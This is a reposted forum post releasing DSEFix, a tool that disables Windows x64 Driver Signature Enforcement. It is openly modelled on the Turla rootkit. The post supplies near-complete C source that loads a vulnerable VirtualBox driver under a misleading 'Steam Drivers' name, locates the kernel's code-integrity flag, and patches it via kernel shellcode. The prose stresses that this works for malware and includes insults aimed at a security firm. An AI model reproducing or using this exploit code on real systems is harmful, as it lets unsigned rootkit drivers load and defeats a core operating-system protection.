[转载]DSEFix - Defeating x64 Driver Signature Enforcement

We are so happy that most of "rootkit" code inside Turla was inspired by our program and features (this level of awareness is never seen anywhere in ITW malware since Rustock), so we decided to create something inspired by Turla in sort of exchange.

What is Driver Signature Enforcement? It is a security feature added to the NT6 which main purpose is to disallow loading drivers without digital signing, see http://msdn.microsoft.com/en-us/library/windows/hardware/dn653559(v=vs.85).aspx for more info. In reality this is yet another marketing bullshit from MS which ruined many freeware programs, and didn't fixed anything in antimalware field - if malware authors really want to load their driver - they will do this. Mainstream crapware like ssdt hooking trash were dying even without this "improvements" because of PatchGuard which in my opinion much better security feature. And how they implemented this DSE feature. Like many of security features inside MS Windows it is implemented by a single variable flag and casual "IF" statement. The internals of this "security feature" are well described in the web.

The 2 major versions of this feature.

First version built-in Vista and without any noticeable changes in Seven. It is based on global private variable g_CiEnabled (type of BOOLEAN) and "if" checks inside private SepInitializeCodeIntegrity routine.

Second version present since Windows 8 - where the above variable was removed and DSE state now controlled via another global variable (this time initialized in CI.DLL) called g_CiOptions inside CipInitialize routine. This is variable that holds combination of flags - by default it value is 6, without DSE it value set to 0 (you can check this by configuring Windows to boot without DSE).
To make life of WinRT jailbreakers harder MS protected this variable by PatchGuard in 8.1 <- this doesn't affect malware anyhow, why? See below. So like in the past of Vista introduced "Protected Processes" all security based on checking one variable.

How Turla works with DSE? It turns it off with help of old VirtualBox driver that have bug allowing to write and execute code in the kernel mode and as result overwrite certain kernel address. The last available rootkit dated end of 2013 wasn't able to run on Windows 8. There two major reasons why - because it can't disable DSE and PatchGuard. They both changed starting Windows 8. About PatchGuard like Cr4sh said "If your Windows rootkit disabling PatchGuard in any ways -- you probably misunderstanding the rootkits conception." And they were unable to disable DSE because of lack of ready to use source code. Funny yes.

This proclaimed to be goverment sponsored lolkit in a reality is just a result, a compilation of several freelancers work (from both UA and RU) to create and support toolkit they sell for various kinds of espionage. For idiots from BAE Systems who are painting fake malware distribution diagrams in the Excel - No KGB or Kremlin here, guys, take a pill and relax with your prepaid propaganda.

So we would like to reimplement this part of Turla, update "Kremlin hand". Additionally we have fixed original Turla bug disallowing it multiple exploitations.

You use this software at your OWN RISK. It was mainly tested on Vista/7/8.1, this program requires admin rights to run, because of driver loading. This program is not malware no matter what AV think or will be thinking in the future.

For 8.1. case - due to PatchGuard checking routine delay - you need to quickly load your unsigned driver and then restore state of g_CiOptions to avoid wonderful BSOD. Again not a problem for a malware.

running dsefix without parameters turns off DSE, to restore DSE run dsefix with -e parameter.

https://www.virustotal.com/en/fi ... nalysis/1402216763/

In case of certificate revocation - bugged VirtualBox driver can be replaced with more fresh

In case if something doesn't work, you found a bug or you want to copy-paste with your own copyrights here is partial source code.

main.cpp:

1. #include "ntdll\ntdll.h"
   
2. #include "ntdll\ntstatus.h"
   
3. #include "main.h"
   
4. #include "vbox.h"
   
5. #include "vboxdrv.h"
   
6. #include "ldasm.h"
   
7. #include "rtls\prtl.h"
   
8. #include "ntdll\winnative.h"
   
9. 
   
10. #pragma data_seg("Shared")
    
11. volatile LONG g_lApplicationInstances = 0;
    
12. #pragma data_seg()
    
13. #pragma comment(linker, "/Section:Shared,RWS")
    
14. 
    
15. 
    
16. RTL_OSVERSIONINFOEXW      osv;
    
17. 
    
18. //disable DSE (vista+)
    
19. const unsigned char shellcode[] = {   /* xor rax, rax */
    
20.    0x48, 0x31, 0xc0, 0xc3            /* ret */
    
21. };
    
22. 
    
23. //enabled DSE (win8+)
    
24. const unsigned char shellcode2[] = {    /* xor rax, rax */
    
25.    0x48, 0x31, 0xc0, 0xb0, 0x06, 0xc3  /* mov al, 6 */
    
26. };                                      /* ret */  
    
27. 
    
28. //enabled DSE (vista+)
    
29. const unsigned char shellcode3[] = {    /* xor rax, rax */
    
30.    0x48, 0x31, 0xc0, 0xb0, 0x01, 0xc3  /* mov al, 1 */
    
31. };                                      /* ret */  
    
32. 
    
33. 
    
34. DWORD align_gt(DWORD p, DWORD align)
    
35. {
    
36.    if ( (p % align) == 0 )
    
37.       return p;
    
38. 
    
39.    return p + align - (p % align);
    
40. }
    
41. 
    
42. DWORD align_le(DWORD p, DWORD align)
    
43. {
    
44.    if ( (p % align) == 0 )
    
45.       return p;
    
46. 
    
47.    return p - (p % align);
    
48. }
    
49. 
    
50. LPVOID PELoaderLoadImage(IN LPVOID Buffer, PDWORD SizeOfImage)
    
51. {
    
52.    LPVOID               exeBuffer = NULL;
    
53.    PIMAGE_DOS_HEADER      dosh = (PIMAGE_DOS_HEADER)Buffer;
    
54.    PIMAGE_FILE_HEADER      fileh = (PIMAGE_FILE_HEADER)((PBYTE)dosh + sizeof(DWORD) + dosh->e_lfanew);
    
55.    PIMAGE_OPTIONAL_HEADER   popth = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
    
56.    PIMAGE_SECTION_HEADER   sections = (PIMAGE_SECTION_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER) + fileh->SizeOfOptionalHeader);
    
57.    DWORD               c, p, rsz;
    
58.    PIMAGE_BASE_RELOCATION   rel;
    
59.    DWORD_PTR            delta;
    
60.    LPWORD               chains;
    
61. 
    
62.    do {
    
63. 
    
64.       *SizeOfImage = popth->SizeOfImage;
    
65.       exeBuffer = VirtualAlloc(NULL, popth->SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    
66.       if ( exeBuffer == NULL )
    
67.          break;
    
68. 
    
69.       // render image
    
70.       memcpy(exeBuffer, Buffer, align_gt(popth->SizeOfHeaders, popth->FileAlignment));
    
71. 
    
72.       for (c=0; c<fileh->NumberOfSections; c++)
    
73.          if ( (sections[c].SizeOfRawData > 0) && (sections[c].PointerToRawData > 0) )
    
74.             memcpy( (PBYTE)exeBuffer + sections[c].VirtualAddress,
    
75.                   (PBYTE)Buffer + align_le(sections[c].PointerToRawData, popth->FileAlignment),
    
76.                   align_gt(sections[c].SizeOfRawData, popth->FileAlignment) );
    
77. 
    
78.       // reloc image
    
79.       dosh = (PIMAGE_DOS_HEADER)exeBuffer;
    
80.       fileh = (PIMAGE_FILE_HEADER)((PBYTE)dosh + sizeof(DWORD) + dosh->e_lfanew);
    
81.       popth = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
    
82.       sections = (PIMAGE_SECTION_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER) + fileh->SizeOfOptionalHeader);
    
83. 
    
84.       if ( popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC )
    
85.          if ( popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0 )
    
86.          {
    
87.             rel = (PIMAGE_BASE_RELOCATION)((PBYTE)exeBuffer + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
    
88.             rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
    
89.             delta = (DWORD_PTR)exeBuffer - popth->ImageBase;
    
90. 
    
91.             c = 0;
    
92.             while ( c < rsz ) {
    
93.                p = sizeof(IMAGE_BASE_RELOCATION);
    
94.                chains = (LPWORD)((PBYTE)rel + p);
    
95. 
    
96.                while ( p < rel->SizeOfBlock ) {
    
97. 
    
98.                   switch (*chains >> 12) {
    
99.                   case IMAGE_REL_BASED_HIGHLOW:
    
100.                      *(LPDWORD)((ULONG_PTR)exeBuffer + rel->VirtualAddress + (*chains & 0x0fff) ) += (DWORD)delta;
     
101.                      break;
     
102.                   case IMAGE_REL_BASED_DIR64:
     
103.                      *(PULONGLONG)((ULONG_PTR)exeBuffer + rel->VirtualAddress + (*chains & 0x0fff) ) += delta;
     
104.                      break;
     
105.                   }
     
106. 
     
107.                   chains++;
     
108.                   p += sizeof(WORD);
     
109.                }
     
110. 
     
111.                c += rel->SizeOfBlock;
     
112.                rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
     
113.             }
     
114.          }
     
115.       
     
116.       return exeBuffer;
     
117.    } while ( FALSE );
     
118. 
     
119.    return NULL;
     
120. }
     
121. 
     
122. LPVOID PELoaderGetProcAddress(LPVOID ImageBase, PCHAR RoutineName )
     
123. {
     
124.    PIMAGE_EXPORT_DIRECTORY      ExportDirectory = NULL;
     
125.    PIMAGE_FILE_HEADER         fh1  = NULL;
     
126.    PIMAGE_OPTIONAL_HEADER32   oh32 = NULL;
     
127.    PIMAGE_OPTIONAL_HEADER64   oh64 = NULL;
     
128. 
     
129.    USHORT      OrdinalNumber;
     
130.    PULONG      NameTableBase;
     
131.    PUSHORT      NameOrdinalTableBase;
     
132.    PULONG      Addr;
     
133.    LONG      Result;
     
134.    ULONG      High, Low, Middle = 0;
     
135. 
     
136.    fh1 = (PIMAGE_FILE_HEADER)((ULONG_PTR)ImageBase + ((PIMAGE_DOS_HEADER)ImageBase)->e_lfanew + sizeof(DWORD) );
     
137.    oh32 = (PIMAGE_OPTIONAL_HEADER32)((ULONG_PTR)fh1 + sizeof(IMAGE_FILE_HEADER));
     
138.    oh64 = (PIMAGE_OPTIONAL_HEADER64)oh32;
     
139. 
     
140.    if (fh1->Machine == IMAGE_FILE_MACHINE_AMD64) {
     
141.       ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)ImageBase +
     
142.          oh64->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
     
143.    } else {
     
144.       ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)ImageBase +
     
145.          oh32->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
     
146.    }
     
147. 
     
148.    NameTableBase = (PULONG)((PBYTE)ImageBase + (ULONG)ExportDirectory->AddressOfNames);
     
149.    NameOrdinalTableBase = (PUSHORT)((PBYTE)ImageBase + (ULONG)ExportDirectory->AddressOfNameOrdinals);
     
150.    Low = 0;
     
151.    High = ExportDirectory->NumberOfNames - 1;
     
152.    while (High >= Low)   {
     
153. 
     
154.       Middle = (Low + High) >> 1;
     
155. 
     
156.       Result = _strcmpA(
     
157.          RoutineName,
     
158.          (char *)ImageBase + NameTableBase[Middle]
     
159.          );
     
160. 
     
161.       if (Result < 0)   {
     
162. 
     
163.          High = Middle - 1;
     
164. 
     
165.       } else {
     
166. 
     
167.          if (Result > 0)   {
     
168. 
     
169.             Low = Middle + 1;
     
170.             
     
171.          } else {
     
172. 
     
173.             break;
     
174.          }
     
175.       }
     
176.    } //while
     
177.    if (High < Low)   
     
178.       return NULL;
     
179. 
     
180.    OrdinalNumber = NameOrdinalTableBase[Middle];
     
181.    if ((ULONG)OrdinalNumber >= ExportDirectory->NumberOfFunctions)
     
182.       return NULL;
     
183. 
     
184.    Addr = (PULONG)((PBYTE)ImageBase + (ULONG)ExportDirectory->AddressOfFunctions);
     
185.    return (LPVOID)((PBYTE)ImageBase + Addr[OrdinalNumber]);
     
186. }
     
187. 
     
188. BOOL ControlDSE(HANDLE hDriver, ULONG_PTR g_CiAddress, PVOID shellcode)
     
189. {
     
190.    BOOL         bRes = FALSE;
     
191.    SUPCOOKIE      Cookie;
     
192.    SUPLDROPEN      OpenLdr;
     
193.    DWORD         bytesIO = 0;
     
194.    PVOID         ImageBase = NULL;
     
195.    PSUPLDRLOAD      pLoadTask = NULL;
     
196.    SUPSETVMFORFAST vmFast;
     
197. 
     
198.    if (!ARGUMENT_PRESENT(hDriver))
     
199.       return FALSE;
     
200.    if (!ARGUMENT_PRESENT(g_CiAddress))
     
201.       return FALSE;
     
202.    if (!ARGUMENT_PRESENT(shellcode))
     
203.       return FALSE;
     
204. 
     
205.    memset(&Cookie, 0, sizeof(SUPCOOKIE));
     
206. 
     
207.    Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE;
     
208.    Cookie.Hdr.cbIn =  SUP_IOCTL_COOKIE_SIZE_IN;
     
209.    Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT;
     
210.    Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
     
211.    Cookie.Hdr.rc = 0;
     
212.    Cookie.u.In.u32ReqVersion = 0;
     
213.    Cookie.u.In.u32MinVersion = 0x00070002;
     
214.    _strcpyA(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC);
     
215. 
     
216.    if (!DeviceIoControl(hDriver, SUP_IOCTL_COOKIE, &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie,
     
217.       SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) goto fail;
     
218. 
     
219.    memset(&OpenLdr, 0, sizeof(OpenLdr));
     
220. 
     
221.    OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
     
222.    OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
     
223.    OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN;
     
224.    OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT;
     
225.    OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
     
226.    OpenLdr.Hdr.rc = 0;
     
227.    OpenLdr.u.In.cbImage = sizeof(OpenLdr.u.In.szName);
     
228.    OpenLdr.u.In.szName[0] = 'a';
     
229.    OpenLdr.u.In.szName[1] = 0;
     
230. 
     
231.    if (!DeviceIoControl(hDriver, SUP_IOCTL_LDR_OPEN, &OpenLdr, SUP_IOCTL_LDR_OPEN_SIZE_IN,
     
232.       &OpenLdr, SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) goto fail;
     
233. 
     
234.    ImageBase = OpenLdr.u.Out.pvImageBase;
     
235. 
     
236.    pLoadTask = (PSUPLDRLOAD)VirtualAlloc(NULL, 0x90, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
     
237.    if (pLoadTask == NULL) goto fail;
     
238. 
     
239.    memset(pLoadTask, 0, 0x90);
     
240. 
     
241.    pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
     
242.    pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
     
243.    pLoadTask->Hdr.cbIn = 0x88;
     
244.    pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT;
     
245.    pLoadTask->Hdr.fFlags =  SUPREQHDR_FLAGS_MAGIC;
     
246.    pLoadTask->Hdr.rc = 0;
     
247.    pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0;
     
248.    pLoadTask->u.In.pvImageBase = (RTR0PTR)ImageBase;
     
249.    pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)(ULONG_PTR)0x1000;
     
250.    pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = (RTR0PTR)ImageBase;
     
251.    pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = (RTR0PTR)ImageBase;
     
252.    pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = (RTR0PTR)ImageBase;
     
253.    memcpy(pLoadTask->u.In.achImage, shellcode, sizeof(shellcode));
     
254.    pLoadTask->u.In.cbImage = 0x20;
     
255. 
     
256.    if (!DeviceIoControl(hDriver, SUP_IOCTL_LDR_LOAD, pLoadTask, 0x88,
     
257.       pLoadTask, sizeof(SUPREQHDR), &bytesIO, NULL)) goto fail;
     
258. 
     
259.    vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
     
260.    vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie;
     
261.    vmFast.Hdr.rc = 0;
     
262.    vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT;
     
263.    vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN;
     
264.    vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT;
     
265.    vmFast.u.In.pVMR0 = (PVOID)(ULONG_PTR)0x1000;
     
266. 
     
267.    if (!DeviceIoControl(hDriver, SUP_IOCTL_SET_VM_FOR_FAST, &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN,
     
268.       &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) goto fail;
     
269. 
     
270. 
     
271.    bRes = DeviceIoControl(hDriver, SUP_IOCTL_FAST_DO_NOP, (LPVOID)g_CiAddress, 0, (LPVOID)g_CiAddress, 0, &bytesIO, NULL);
     
272. 
     
273. fail:
     
274.    if (pLoadTask != NULL) VirtualFree(pLoadTask, 0, MEM_RELEASE);
     
275.    if (hDriver != NULL) CloseHandle(hDriver);
     
276.    return bRes;
     
277. }
     
278. 
     
279. BOOL DoWork(HANDLE hDriver, BOOL bDisable)
     
280. {
     
281.    BOOL                  bRes = FALSE;
     
282.    PRTL_PROCESS_MODULES      miSpace = NULL;
     
283.    ULONG                  rl = 0, c;
     
284.    LONG                  rel = 0;
     
285.    NTSTATUS               ntStatus = STATUS_UNSUCCESSFUL;
     
286.    CHAR                  KernelFullPathName[BUFFER_SIZE];
     
287.    CHAR                  textbuf[BUFFER_SIZE];
     
288.    PVOID                  sc = NULL, kBuffer = NULL, MappedKernel = NULL;
     
289.    PBYTE                  CiInit = NULL;
     
290.    ULONG_PTR               KernelBase = 0L;
     
291.    HANDLE                  hFile = INVALID_HANDLE_VALUE;
     
292.    LARGE_INTEGER            fsz;
     
293.    ldasm_data               ld;
     
294. 
     
295.    if (!ARGUMENT_PRESENT(hDriver))
     
296.       return FALSE;
     
297. 
     
298.    do {
     
299. 
     
300.       miSpace = (PRTL_PROCESS_MODULES)VirtualAllocEx(GetCurrentProcess(), NULL, 1024*1024, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
     
301.       if ( miSpace == NULL )
     
302.          break;
     
303.       
     
304.       ntStatus = NtQuerySystemInformation(SystemModuleInformation, miSpace, 1024*1024, &rl);
     
305.       if ( !NT_SUCCESS(ntStatus) )
     
306.          break;
     
307. 
     
308.       if ( miSpace->NumberOfModules == 0 )
     
309.          break;
     
310. 
     
311.       rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH);
     
312.       if ( rl == 0 )
     
313.          break;
     
314.       
     
315.       KernelFullPathName[rl] = (CHAR)'\\';
     
316.       
     
317.       
     
318.       _strcpyA(textbuf, "[DF] Windows v");
     
319.       ultostrA(osv.dwMajorVersion, _strendA(textbuf));
     
320.       _strcatA(textbuf, ".");
     
321.       ultostrA(osv.dwMinorVersion, _strendA(textbuf));
     
322.       OutputDebugStringA(textbuf);
     
323. 
     
324. 
     
325.       if ( osv.dwMinorVersion < 2 ) {
     
326.          _strcpyA(&KernelFullPathName[rl+1], (const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]);
     
327.          KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
     
328.       } else {
     
329.          _strcpyA(&KernelFullPathName[rl+1], "CI.DLL");
     
330.          for (c=0; c<miSpace->NumberOfModules; c++)
     
331.             if ( _strcmpiA((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName], "CI.DLL") == 0 ) {
     
332.                KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase;
     
333.                break;
     
334.             }
     
335.       }
     
336. 
     
337.       VirtualFreeEx(GetCurrentProcess(), miSpace, 0, MEM_RELEASE);
     
338.       miSpace = NULL;
     
339. 
     
340. 
     
341.       _strcpyA(textbuf, "[DF] Target module ");
     
342.       _strcatA(textbuf, KernelFullPathName);
     
343.       OutputDebugStringA(textbuf);
     
344. 
     
345. 
     
346.       hFile = CreateFileA(KernelFullPathName, SYNCHRONIZE | FILE_READ_DATA, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
     
347. 
     
348.       _strcpyA(textbuf, "[DF] Module base ");
     
349.       u64tohexA(KernelBase, _strendA(textbuf));
     
350.       OutputDebugStringA(textbuf);
     
351. 
     
352.       if ( hFile == INVALID_HANDLE_VALUE )
     
353.          break;
     
354.       fsz.QuadPart = 0;
     
355.       GetFileSizeEx(hFile, &fsz);
     
356. 
     
357.       kBuffer = (PRTL_PROCESS_MODULES)VirtualAllocEx(GetCurrentProcess(), NULL, fsz.LowPart, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
     
358.       if ( kBuffer == NULL )
     
359.          break;
     
360.       if ( !ReadFile(hFile, kBuffer, fsz.LowPart, &rl, NULL) )
     
361.          break;
     
362.       CloseHandle(hFile);
     
363.       hFile = INVALID_HANDLE_VALUE;
     
364. 
     
365.       MappedKernel = PELoaderLoadImage(kBuffer, &rl);
     
366.       if (MappedKernel == NULL)
     
367.          break;
     
368. 
     
369.       VirtualFreeEx(GetCurrentProcess(), kBuffer, 0, MEM_RELEASE);
     
370.       kBuffer = NULL;
     
371.       
     
372.       /* find g_CiEnabled vista, seven */
     
373.       if ( osv.dwMinorVersion < 2 ) {
     
374.          for (c=0; c<rl-sizeof(DWORD); c++) {
     
375.             if ( *(PDWORD)((PBYTE)MappedKernel + c) == 0x1d8806eb ) {
     
376.                rel = *(PLONG)((PBYTE)MappedKernel + c+4);
     
377.                KernelBase = KernelBase + c+8 + rel;
     
378.                break;
     
379.             }
     
380.          }
     
381.       } else {
     
382.          /* find g_CiOptions w8, blue */
     
383.          CiInit = (PBYTE)PELoaderGetProcAddress(MappedKernel, "CiInitialize");
     
384.          c=0;
     
385.          do {
     
386.             if ( CiInit[c] == 0xE9 ) {      /* jmp CipInitialize */
     
387.                rel = *(PLONG)(CiInit+c+1);
     
388.                break;
     
389.             }
     
390.             c += ldasm(CiInit+c, &ld, 1);
     
391.          } while (c < 256);
     
392.          CiInit = CiInit + c+5 + rel;
     
393.          c=0;
     
394.          do {
     
395.             if ( *(PUSHORT)(CiInit+c) == 0x0d89 ) {
     
396.                rel = *(PLONG)(CiInit+c+2);
     
397.                break;
     
398.             }
     
399.             c += ldasm(CiInit+c, &ld, 1);
     
400.          } while (c < 256);
     
401.          CiInit = CiInit + c+6 + rel;
     
402.          KernelBase = KernelBase + CiInit - (PBYTE)MappedKernel;
     
403.       }
     
404. 
     
405.       if ( rel == 0 )
     
406.          break;
     
407. 
     
408.       _strcpyA(textbuf, "[DF] Apply patch to address ");
     
409.       u64tohexA(KernelBase, _strendA(textbuf));
     
410.       OutputDebugStringA(textbuf);
     
411. 
     
412.       if (bDisable) {
     
413.          sc = (PVOID)shellcode;
     
414.       } else {
     
415.          //vista+
     
416.          if ( osv.dwMinorVersion < 2 ) {
     
417.             sc = (PVOID)shellcode3;
     
418.          } else {
     
419.             //8+
     
420.             sc = (PVOID)shellcode2;
     
421.          }
     
422.       }
     
423. 
     
424.       bRes = ControlDSE(hDriver, KernelBase, sc);
     
425. 
     
426.    } while ( FALSE );
     
427. 
     
428. 
     
429.    if ( hFile != INVALID_HANDLE_VALUE )
     
430.       CloseHandle(hFile);
     
431.    if ( kBuffer != NULL )
     
432.       VirtualFreeEx(GetCurrentProcess(), kBuffer, 0, MEM_RELEASE);
     
433.    if ( MappedKernel != NULL )
     
434.       VirtualFreeEx(GetCurrentProcess(), MappedKernel, 0, MEM_RELEASE);
     
435.    if ( miSpace != NULL )
     
436.       VirtualFreeEx(GetCurrentProcess(), miSpace, 0, MEM_RELEASE);
     
437. 
     
438. 
     
439.    return bRes;
     
440. }
     
441. 
     
442. HANDLE LoadVulnerableDriver(
     
443.    VOID
     
444.    )
     
445. {
     
446.    HANDLE                hDriver = NULL;
     
447.    NTSTATUS             Status = STATUS_UNSUCCESSFUL;
     
448.    UNICODE_STRING       drvname;
     
449.    OBJECT_ATTRIBUTES    attr;
     
450.    WCHAR                szDriverBuffer[BUFFER_SIZE];   
     
451. 
     
452.    RtlSecureZeroMemory(szDriverBuffer, BUFFER_SIZE);
     
453.    _strcpyW(szDriverBuffer, L"\\??\");
     
454. 
     
455.    if (GetSystemDirectory(&szDriverBuffer[4], MAX_PATH)) {
     
456. 
     
457.       _strcatW(szDriverBuffer, L"\\drivers\\ultra4.sys");
     
458. 
     
459.       Status = (NTSTATUS)NativeWriteBufferToFile(&szDriverBuffer[4], VBoxDrv,
     
460.          sizeof(VBoxDrv), FALSE, FALSE);
     
461. 
     
462.       if ( NT_SUCCESS(Status) ) {
     
463.          Status = NativeLoadDriver(szDriverBuffer, VBoxDrvRegPath, VBoxDrvDispName);
     
464.          if ( NT_SUCCESS(Status) ) {
     
465.             hDriver = NativeOpenDevice(VBoxDrvDevName, NULL);
     
466.          }
     
467. 
     
468.          RtlInitUnicodeString(&drvname, szDriverBuffer);
     
469.          InitializeObjectAttributes(&attr, &drvname, OBJ_CASE_INSENSITIVE, 0, NULL);
     
470.          NtDeleteFile(&attr);
     
471.       }
     
472.    }
     
473.    return hDriver;
     
474. }
     
475. 
     
476. void UnloadVulnerableDriver(
     
477.    VOID
     
478.    )
     
479. {
     
480.    NativeUnLoadDriver(VBoxDrvRegPath);
     
481.    NativeRegDeleteKeyRecursive(0, VBoxDrvRegPath);
     
482. }
     
483. 
     
484. void main()
     
485. {
     
486.    LONG x;
     
487.    ULONG l = 0;
     
488.    HANDLE hDriver = NULL;
     
489.    WCHAR cmdLineParam[MAX_PATH];
     
490.    BOOL bDisable = TRUE;
     
491.    
     
492.    OutputDebugStringA("[DF] DSEFIX v1.0 started (c) 2014 EP_X0FF, MP_ART, nrin");
     
493.    OutputDebugStringA("[DF] Supported x64 OS: from NT6.0 up to NT6.3");
     
494. 
     
495.    x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
     
496.    if ( x > 1 ) {
     
497.       InterlockedDecrement((PLONG)&g_lApplicationInstances);
     
498.       OutputDebugStringA("[DF] Another instance running, close it before");
     
499.       ExitProcess(0);
     
500.       return;
     
501.    }
     
502. 
     
503.    RtlSecureZeroMemory(&osv, sizeof(osv));
     
504.    osv.dwOSVersionInfoSize = sizeof(osv);
     
505.    RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);
     
506.    if ( osv.dwMajorVersion != 6 ) {
     
507.                 InterlockedDecrement((PLONG)&g_lApplicationInstances);
     
508.       OutputDebugStringA("[DF] Unsuppoted OS");
     
509.       ExitProcess(0);
     
510.       return;
     
511.    }
     
512. 
     
513.    RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
     
514.    GetCommandLineParamW(GetCommandLineW(), 1, cmdLineParam, MAX_PATH, &l);
     
515. 
     
516.    if ( _strcmpiW(cmdLineParam, L"-e") == 0 ) {
     
517.       OutputDebugStringA("[DF] DSE will be (re)enabled");
     
518.       bDisable = FALSE;
     
519.    } else {
     
520.       OutputDebugStringA("[DF] DSE will be disabled");
     
521.       bDisable = TRUE;
     
522.    }
     
523. 
     
524.    //assign driver load privilege
     
525.    if (NT_SUCCESS(NativeAdjustPrivileges(SE_LOAD_DRIVER_PRIVILEGE))) {
     
526. 
     
527.       OutputDebugStringA("[DF] Load driver privilege adjusted");
     
528. 
     
529.       hDriver = LoadVulnerableDriver();
     
530.       if (hDriver != NULL) {
     
531. 
     
532.          OutputDebugStringA("[DF] Vulnerable driver loaded");
     
533. 
     
534.          //manupulate kernel variable      
     
535.          if (DoWork(hDriver, bDisable)) {
     
536.             OutputDebugStringA("[DF] Kernel memory patched");
     
537.          } else {
     
538.             OutputDebugStringA("[DF] Failed to patch kernel memory");
     
539.          }
     
540. 
     
541.          OutputDebugStringA("[DF] Cleaning up");
     
542.          UnloadVulnerableDriver();
     
543.       } else {
     
544.          OutputDebugStringA("[DF] Failed to load vulnerable driver");
     
545.       }
     
546. 
     
547.    } else {
     
548.       OutputDebugStringA("[DF] Cannot adjust privilege");
     
549.    }
     
550.    InterlockedDecrement((PLONG)&g_lApplicationInstances);
     
551.    OutputDebugStringA("[DF] Finish");
     
552.    ExitProcess(0);
     
553. }

复制代码

main.h

1. #define BUFFER_SIZE MAX_PATH * 2
   
2. #define VBoxDrvDispName L"Steam Drivers"
   
3. #define VBoxDrvRegPath   L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\vboxdrv"
   
4. #define VBoxDrvDevName  L"\\Device\\VBoxDrv"

复制代码

vboxdrv.h is a translated to C array binary of vulnerable driver
vbox header -> http://www.kernelmode.info/forum/viewtopic.php?p=22363#p22363
ldasm -> https://github.com/vol4ok/libspl ... ibsplice_km/ldasm.c